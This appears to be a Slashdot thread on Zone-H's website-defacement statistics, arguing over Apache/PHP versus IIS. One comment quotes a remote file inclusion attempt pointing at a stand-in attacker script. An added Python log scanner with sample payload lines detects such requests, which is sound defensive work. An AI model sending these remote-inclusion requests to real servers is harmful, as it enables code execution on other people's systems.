Slashdot Mirror


Breakdowns of Website Defacement by Platform

SkiifGeek writes "Zone-H have recently posted the statistical breakdown of the collected website defacements from the last few years. Surprisingly, in 2007 more Linux servers suffered a successful attack than all versions of Windows, combined. Similarly, more Apache installations were successfully attacked than all IIS versions combined. A day after posting this data, Zone-H have questioned the appropriateness of continuing to operate the archive. Despite the valuable information that can be gleaned from the service, it may soon be lost to the world. The natural successor to the now-defunct Alldas archive of defaced websites, Zone-H's archive maintains records of over 2.6 million defaced sites but may be shut down due to the continuous accusations of impropriety leveled against them any time they disclose and mirror a reported defacement."

6 of 203 comments

  1. Re:"Surprisingly"? by call-me-kenneth · · Score: 5, Informative

    Two factors. One, there are dozens and dozens of utterly lame hosting control panels, content management systems, messageboards and suchlike written in PHP. Secondly, IIS is far, far more secure than it was back in the bad old days. (And I speak as a fervent Apache supporter.)

  2. Re:Demographic breakdown by EsJay · · Score: 2, Informative

    You don't pay extra for IIS or pirate it. It's included with Windows XP Professional and Vista (I don't know exactly which editions) as well as Windows Server.

  3. Re:"Surprisingly"? by 0kComputer · · Score: 2, Informative

    The author attributes this number to the fact that more people are switching from IIS to Apache. Check out the latest Netcraft survey; that doesn't seem to be the case. Over the last few years, IIS seems to be hanging on at around 35-40% market share and Apache around 50-60%.

    --
    Top 10 Reasons To Procrastinate
    10.

  4. Re:!Apache, but PHP by corsec67 · · Score: 2, Informative

    Agreed on the PHP being a huge problem.
    At my work, we see a bunch of attempts to exploit PHP every week, usually like this:

    http://www.example.com?var=http://www.1337h4x0r/script.php
    (we don't even use PHP, so this is probably coming from other hacked servers that are running PHP)

    The "feature" they are trying to exploit there is just crazy:
    If var in that case is used as a file name in a script load call, PHP will happily download the script from that website and run it instead of the local file that was expected. There are a bunch of problems with what is going on there, since having a file name in the URL is just horrible, but then for the language to then take a URL and download the file automatically is even worse.

    From, quite appropriately enough, The Daily WTF
    --
    If I have nothing to hide, don't search me
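
Added example (not part of the original thread and not any commenter's code): a log check for the request pattern described in comment 4, where a query parameter carries a URL. It also normalises double percent-encoding, which goes beyond the single form quoted in the comment; the log lines, client addresses and the `host.invalid` name are constructed, and the combined log format is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Value starts with a URL scheme that a script-load call could fetch remotely.
REMOTE_SCHEME = re.compile(r"^\s*(?:https?|ftps?)://", re.I)
# Request line inside a combined-log-format entry: "METHOD target HTTP/x.y"
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values (%253A) are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def rfi_candidates(log_line):
    """Return [(param, decoded_value)] for query parameters whose value is a URL."""
    m = REQUEST_LINE.search(log_line)
    if not m:
        return []
    hits = []
    for name, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        value = fully_decode(value)
        if REMOTE_SCHEME.match(value):
            hits.append((name, value))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2008:10:01:02 +0000] "GET /?var=http://www.1337h4x0r/script.php HTTP/1.1" 404 210',
    '192.0.2.11 - - [12/Mar/2008:10:01:09 +0000] "GET /index.php?page=http%253A%252F%252Fhost.invalid%252Fs.txt HTTP/1.1" 404 210',
    '192.0.2.12 - - [12/Mar/2008:10:02:30 +0000] "GET /search?q=http+headers&page=2 HTTP/1.1" 200 5120',
    '192.0.2.13 - - [12/Mar/2008:10:03:00 +0000] "GET /about.html HTTP/1.1" 200 1024',
]

def scan(lines):
    """Map client address -> list of suspicious (param, value) pairs."""
    report = {}
    for line in lines:
        hits = rfi_candidates(line)
        if hits:
            report.setdefault(line.split()[0], []).extend(hits)
    return report

if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG).items():
        print(client, hits)
```

A hit only means the request carried a URL in a parameter; whether it mattered depends on the application, as the commenter's own server (no PHP at all) illustrates.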

  5. Except that IIS is at 35% and Apache at 50% by mverwijs · · Score: 2, Informative

    Last I checked, IIS was at about 35% and Apache at 50%.

      --> http://news.netcraft.com/archives/2008/02/06/february_2008_web_server_survey.html

    Of course, these are just statistics...

    -mverwijs

  6. Re:Yeah, yeah, yeah, wrong. by Macthorpe · · Score: 2, Informative

    > I don't like the blame the user excuse, but that is what is being reported.

    Read this as: "I always deny the 'Blame the user' excuse when it's Windows, but seeing as it's Linux that has the problem here I'm willing to change my mind."

    > Sometimes they use a decimal point to represent 10^3 divisions and sometimes they don't use anything.

    I only see one instance of this (NOYB, 2006, '1308' instead of '1.308') but I'm sure you can tell us how this completely destroys their credibility.

    > Headings appear to duplicate each other, like the "Remote service password guessing" and "Remote service password bruteforce"

    You'd be right if they were the same thing, but they're not.

    > Finally, there are dozens of exploits "patched" each month for Windows but none of these technical problems shows up in their charts - only common problems are categorized. Is patch Tuesday a farce or are the fixes real and the problems worth tracking?

    It's not an exploit count, it's a log of all incidents where websites were attacked successfully. I'll let you go and find an exploit count for IIS 6.0 and Apache 2.2 yourself (I'll give you a hint though, you won't like the numbers).
    --
    "It does not do to leave a live dragon out of your calculations, if you live near him." - Tolkien